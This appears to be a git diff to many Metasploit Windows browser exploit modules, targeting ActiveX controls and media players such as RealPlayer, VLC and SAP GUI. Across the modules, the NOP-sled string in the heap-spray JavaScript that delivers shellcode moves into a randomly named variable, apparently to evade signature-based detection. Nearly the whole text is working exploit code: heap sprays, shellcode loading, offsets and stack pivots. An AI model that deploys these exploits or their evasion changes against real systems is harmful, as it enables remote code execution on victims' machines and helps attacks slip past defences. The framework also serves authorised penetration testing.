--- a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb
+++ b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb
@@ -88,12 +88,14 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|<html>
 <object id='#{vname}' classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'></object>
 <script language="JavaScript">
 var #{rand1} = unescape('#{shellcode}');
-var #{rand2} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{rand2} = unescape(#{randnop});
 var #{rand3} = 20;
 var #{rand4} = #{rand3} + #{rand1}.length;
 while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
diff --git a/modules/exploits/windows/browser/ntr_activex_check_bof.rb b/modules/exploits/windows/browser/ntr_activex_check_bof.rb
index c9c112ddb1..594bfca7bc 100644
--- a/modules/exploits/windows/browser/ntr_activex_check_bof.rb
+++ b/modules/exploits/windows/browser/ntr_activex_check_bof.rb
@@ -158,6 +158,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Exploit writing tutorial part 11 : Heap Spraying Demystified
   # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
   def get_random_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
@@ -185,7 +186,8 @@ class MetasploitModule < Msf::Exploit::Remote
     var heap_obj = new heapLib.ie(0x10000);
 
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -207,11 +209,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
diff --git a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
index 05fec597c0..306ca7a594 100644
--- a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
+++ b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
@@ -78,11 +78,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
diff --git a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
index 0e599fc233..0cfd2b921f 100644
--- a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
+++ b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
@@ -133,11 +133,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_easy_spray(t, js_code, js_nops, js_counter)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var counter = unescape("#{js_counter}");
 
     while (nops.length < 0x80000) nops += nops;
@@ -162,11 +164,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_aligned_spray(t, js_code, js_nops, js_counter, js_stack_pivot)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var counter = unescape("#{js_counter}");
     var stack_pivot = unescape("#{js_stack_pivot}")
 
@@ -196,6 +200,8 @@ class MetasploitModule < Msf::Exploit::Remote
   # Exploit writing tutorial part 11 : Heap Spraying Demystified
   # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
   def get_random_spray(t, js_code, js_nops, js_90_nops, js_counter, js_stack_pivot)
+    randnop = rand_text_alpha(rand(100) + 1)
+    randnop2 = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
@@ -223,8 +229,10 @@ class MetasploitModule < Msf::Exploit::Remote
     var heap_obj = new heapLib.ie(0x10000);
 
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
-    var nops_90 = unescape("#{js_90_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
+    var #{randnop2} = "#{js_90_nops}";
+    var nops_90 = unescape(#{randnop2});
     var counter = unescape("#{js_counter}");
     var stack_pivot = unescape("#{js_stack_pivot}")
 
diff --git a/modules/exploits/windows/browser/pcvue_func.rb b/modules/exploits/windows/browser/pcvue_func.rb
index bf4fea28d8..6641fabaac 100644
--- a/modules/exploits/windows/browser/pcvue_func.rb
+++ b/modules/exploits/windows/browser/pcvue_func.rb
@@ -96,11 +96,13 @@ class MetasploitModule < Msf::Exploit::Remote
     j_block      = rand_text_alpha(rand(100) + 1)
     j_memory     = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
-    j_txt	     = rand_text_alpha(rand(8) + 4)
+    j_txt        = rand_text_alpha(rand(8) + 4)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     js = <<-EOS
 var #{j_shellcode} = unescape('#{shellcode}');
-var #{j_nops} = unescape("#{nops}");
+var #{randnop} = "#{nops}";
+var #{j_nops} = unescape(#{randnop});
 var #{j_headersize} = 20;
 var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
 while(#{j_nops}.length < #{j_slackspace}) {
diff --git a/modules/exploits/windows/browser/quickr_qp2_bof.rb b/modules/exploits/windows/browser/quickr_qp2_bof.rb
index 4fb97a0ffc..31651946ba 100644
--- a/modules/exploits/windows/browser/quickr_qp2_bof.rb
+++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb
@@ -117,6 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     case my_target
@@ -146,7 +147,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var heap_obj = new heapLib.ie(0x10000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_random_nops}");
+      var #{randnop} = "#{js_random_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset_length = #{my_target['Offset']};
       for (var i=0; i < 0x1000; i++) {
@@ -165,7 +167,8 @@ class MetasploitModule < Msf::Exploit::Remote
       js = %Q|
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
diff --git a/modules/exploits/windows/browser/realplayer_cdda_uri.rb b/modules/exploits/windows/browser/realplayer_cdda_uri.rb
index 049dfae49f..31c94536e0 100644
--- a/modules/exploits/windows/browser/realplayer_cdda_uri.rb
+++ b/modules/exploits/windows/browser/realplayer_cdda_uri.rb
@@ -75,6 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
     var_nopsled   = rand_text_alpha(rand(6)+3)
     spray_func    = rand_text_alpha(rand(6)+3)
     obj_id        = rand_text_alpha(rand(6)+3)
+    randnop       = rand_text_alpha(rand(100) + 1)
     html = <<-EOS
 <html>
 <head>
@@ -82,7 +83,8 @@ class MetasploitModule < Msf::Exploit::Remote
 function #{spray_func}() {
   #{var_blocks} = new Array();
   var #{var_shellcode} = unescape("#{shellcode}");
-  var #{var_nopsled} = unescape("#{nop_sled}");
+  var #{randnop} = "#{nop_sled}";
+  var #{var_nopsled} = unescape(#{randnop});
   do { #{var_nopsled} += #{var_nopsled} } while (#{var_nopsled}.length < 8200);
     for (#{var_index}=0; #{var_index} < 19000; #{var_index}++)
       #{var_blocks}[#{var_index}] = #{var_nopsled} + #{var_shellcode};
diff --git a/modules/exploits/windows/browser/realplayer_console.rb b/modules/exploits/windows/browser/realplayer_console.rb
index 5e8066f7bb..55358d516e 100644
--- a/modules/exploits/windows/browser/realplayer_console.rb
+++ b/modules/exploits/windows/browser/realplayer_console.rb
@@ -80,13 +80,15 @@ class MetasploitModule < Msf::Exploit::Remote
     j_memory     = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
     j_ret        = rand_text_alpha(rand(100) + 1)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content = %Q|<html>
 <object classid='clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93' id='#{racontrol}'></object>
 <script language='javascript'>
 #{j_shellcode} = unescape('#{shellcode}');
-#{j_nops} = unescape('#{nops}');
+#{randnop} = "#{nops}";
+#{j_nops} = unescape(#{randnop});
 #{j_headersize} = 20;
 #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
diff --git a/modules/exploits/windows/browser/realplayer_qcp.rb b/modules/exploits/windows/browser/realplayer_qcp.rb
index f63872c19a..a4df489231 100644
--- a/modules/exploits/windows/browser/realplayer_qcp.rb
+++ b/modules/exploits/windows/browser/realplayer_qcp.rb
@@ -214,11 +214,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def build_spray(mytarget, code)
+    randnop = rand_text_alpha(rand(100) + 1)
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
 
     var code = unescape("#{code}");
-    var nops = unescape("#{mytarget['Nops']}");
+    var #{randnop} = "#{mytarget['Nops']}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x10000) nops += nops;
     offset = nops.substring(0, 0x7BE0);
diff --git a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
index afe02eb33a..09c2fa3de4 100644
--- a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
+++ b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
@@ -104,11 +104,13 @@ class MetasploitModule < Msf::Exploit::Remote
     p = payload.encoded
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
diff --git a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb
index b53b4c019d..378010a008 100644
--- a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb
+++ b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb
@@ -77,13 +77,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|
     <html>
       <object id='#{vname}' classid='clsid:AFBBE070-7340-11D2-AA6B-00E02924C34E'></object>
       <script language="JavaScript">
         var #{rand1} = unescape('#{shellcode}');
-        var #{rand2} = unescape('#{nops}');
+        var #{randnop} = "#{nops}";
+        var #{rand2} = unescape(#{randnop});
         var #{rand3} = 20;
         var #{rand4} = #{rand3} + #{rand1}.length;
         while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
diff --git a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
index 0ae730bf53..e62b899bb7 100644
--- a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
+++ b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
@@ -136,6 +136,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie9_spray(t, p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(t.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(t.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = %Q|
 
@@ -212,7 +213,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     var heap_obj = new heapLib.ie(0x10000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_random_nops}");
+    var #{randnop} = "#{js_random_nops}";
+    var nops = unescape(#{randnop});
 
     function heap_spray(jutil_base) {
       while (nops.length < 0x80000) nops += nops;
@@ -235,11 +237,13 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie8_spray(t, p)
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(t.arch))
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(t.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = %Q|
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     function rop_chain(jutil_base){
       var arr = [
@@ -310,10 +314,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie6_spray(t, p)
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(t.arch))
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(t.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = %Q|
     var heap_obj = new heapLib.ie(0x20000);
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var code = unescape("#{js_code}");
 
     function heap_spray() {
diff --git a/modules/exploits/windows/browser/softartisans_getdrivename.rb b/modules/exploits/windows/browser/softartisans_getdrivename.rb
index 7649666ea1..47bb898e43 100644
--- a/modules/exploits/windows/browser/softartisans_getdrivename.rb
+++ b/modules/exploits/windows/browser/softartisans_getdrivename.rb
@@ -77,6 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|
   <html>
@@ -85,7 +86,8 @@ class MetasploitModule < Msf::Exploit::Remote
     try {
       var #{vname} = new ActiveXObject('SoftArtisans.FileManager.1');
       var #{rand1} = unescape('#{shellcode}');
-      var #{rand2} = unescape('#{nops}');
+      var #{randnop} = "#{nops}";
+      var #{rand2} = unescape(#{randnop});
       var #{rand3} = 20;
       var #{rand4} = #{rand3} + #{rand1}.length;
       while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
diff --git a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb
index eb84ff49fe..7a2669977c 100644
--- a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb
+++ b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb
@@ -84,13 +84,15 @@ class MetasploitModule < Msf::Exploit::Remote
     j_ret        = rand_text_alpha(rand(100) + 1)
     j_junk       = rand_text_alpha(rand(100) + 1)
     j_filename   = rand_text_alpha(rand(16) + 1)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content = %Q|<html>
 <object classid='clsid:22ACD16F-99EB-11D2-9BB3-00400561D975' id='#{pvcalendar}'></object>
 <script language='javascript'>
 #{j_shellcode} = unescape('#{shellcode}');
-#{j_nops} = unescape('#{nops}');
+#{randnop} = "#{nops}";
+#{j_nops} = unescape(#{randnop});
 #{j_headersize} = 20;
 #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb
index 3d1094e6d1..64ef0f1357 100644
--- a/modules/exploits/windows/browser/teechart_pro.rb
+++ b/modules/exploits/windows/browser/teechart_pro.rb
@@ -140,11 +140,14 @@ class MetasploitModule < Msf::Exploit::Remote
     obj_name  = rand_text_alpha(rand(100) + 1)
     main_sym  = 'main' #main function name
 
+    randnop = rand_text_alpha(rand(100) + 1)
+
     if my_target.name =~ /IE6/ or my_target.name =~ /IE7/
       js = <<-EOS
 var sc = unescape('#{sc}');
 
-var nops = unescape('%u0c0c%u0c0c');
+var #{randnop} = "%u0c0c%u0c0c";
+var nops = unescape(#{randnop});
 var offset = 20;
 var s = offset + sc.length;
 while(nops.length < s) {
diff --git a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
index a6d47cb374..d20afc755f 100644
--- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
+++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
@@ -193,6 +193,8 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
     js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
+    randnop2 = rand_text_alpha(rand(100) + 1)
 
     if my_target['Rop'].nil?
       js_shellcode = "var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);"
@@ -209,8 +211,10 @@ class MetasploitModule < Msf::Exploit::Remote
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
-    var nops_90 = unescape("#{js_90_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
+    var #{randnop2} = "#{js_90_nops}";
+    var nops_90 = unescape(#{randnop2});
 
     while (nops.length < 0x80000) nops += nops;
     while (nops_90.length < 0x80000) nops_90 += nops_90;
diff --git a/modules/exploits/windows/browser/trendmicro_extsetowner.rb b/modules/exploits/windows/browser/trendmicro_extsetowner.rb
index 27990a4b47..976f1eff5b 100644
--- a/modules/exploits/windows/browser/trendmicro_extsetowner.rb
+++ b/modules/exploits/windows/browser/trendmicro_extsetowner.rb
@@ -109,12 +109,14 @@ class MetasploitModule < Msf::Exploit::Remote
     j_block      = rand_text_alpha(rand(100) + 1)
     j_memory     = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     html = %Q|<html>
 <object classid='clsid:#{clsid}' id='#{ufpbctrl}'></object>
 <script>
 var #{j_shellcode} = unescape('#{shellcode}');
-var #{j_nops} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{j_nops} = unescape(#{randnop});
 var #{j_headersize} = 20;
 var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
diff --git a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb
index 3f80edb8c0..0ff3640325 100644
--- a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb
+++ b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb
@@ -87,6 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Convert the pivot addr (in decimal format) to binary,
     # and then break it down to this printable format:
@@ -100,7 +101,8 @@ class MetasploitModule < Msf::Exploit::Remote
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
diff --git a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
index 0fbad9ab17..ad8d85f23d 100644
--- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
+++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
@@ -148,11 +148,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Payload in JS format
     code = Rex::Text.to_unescape(code)
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
 
     spray = <<-JS
     var heap_lib = new heapLib.ie(0x20000);
     var code = unescape("#{code}");
-    var nops = unescape("%u0c0c%u0c0c");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x2000) nops += nops;
     var offset = nops.substring(0, 0x800-0x20);
diff --git a/modules/exploits/windows/browser/vlc_amv.rb b/modules/exploits/windows/browser/vlc_amv.rb
index 945f0a6dcc..6c42f62c99 100644
--- a/modules/exploits/windows/browser/vlc_amv.rb
+++ b/modules/exploits/windows/browser/vlc_amv.rb
@@ -161,12 +161,14 @@ class MetasploitModule < Msf::Exploit::Remote
       code = Rex::Text.to_unescape(payload.encoded, arch)
       pivot   = Rex::Text.to_unescape([my_target['TargetAddr']].pack('V*'), arch)
     end
+    randnop = rand_text_alpha(rand(100) + 1)
 
     #First spray overwrites 0x0c0c0c0c with our payload
     spray_1 = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{code}");
-    var nops = unescape("#{nops}");
+    var #{randnop} = "#{nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x1000) nops += nops;
     var offset = nops.substring(0, 0x600-0x20);
@@ -185,7 +187,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #An invalid pointer gets passed on to libdirectx_plugin!vlc_entry_license__1_1_0g,
     #which requires us to fill up the memory as high as 0x303234ca
     spray_2 = <<-JS
-    var padding = unescape("#{nops}");
+    var padding = unescape(#{randnop});
     var pivot = unescape("#{pivot}");
 
     while (padding.length < 0x20000) padding += padding;
diff --git a/modules/exploits/windows/browser/vlc_mms_bof.rb b/modules/exploits/windows/browser/vlc_mms_bof.rb
index 62256ab681..49cf85e39d 100644
--- a/modules/exploits/windows/browser/vlc_mms_bof.rb
+++ b/modules/exploits/windows/browser/vlc_mms_bof.rb
@@ -126,12 +126,14 @@ class MetasploitModule < Msf::Exploit::Remote
     arch = Rex::Arch.endian(my_target.arch)
     nops = Rex::Text.to_unescape("\x0c\x0c\x0c\x0c", arch)
     code = Rex::Text.to_unescape(payload.encoded, arch)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Spray overwrites 0x30303030 with our payload
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{code}");
-    var nops = unescape("#{nops}");
+    var #{randnop} = "#{nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['OffsetShell']});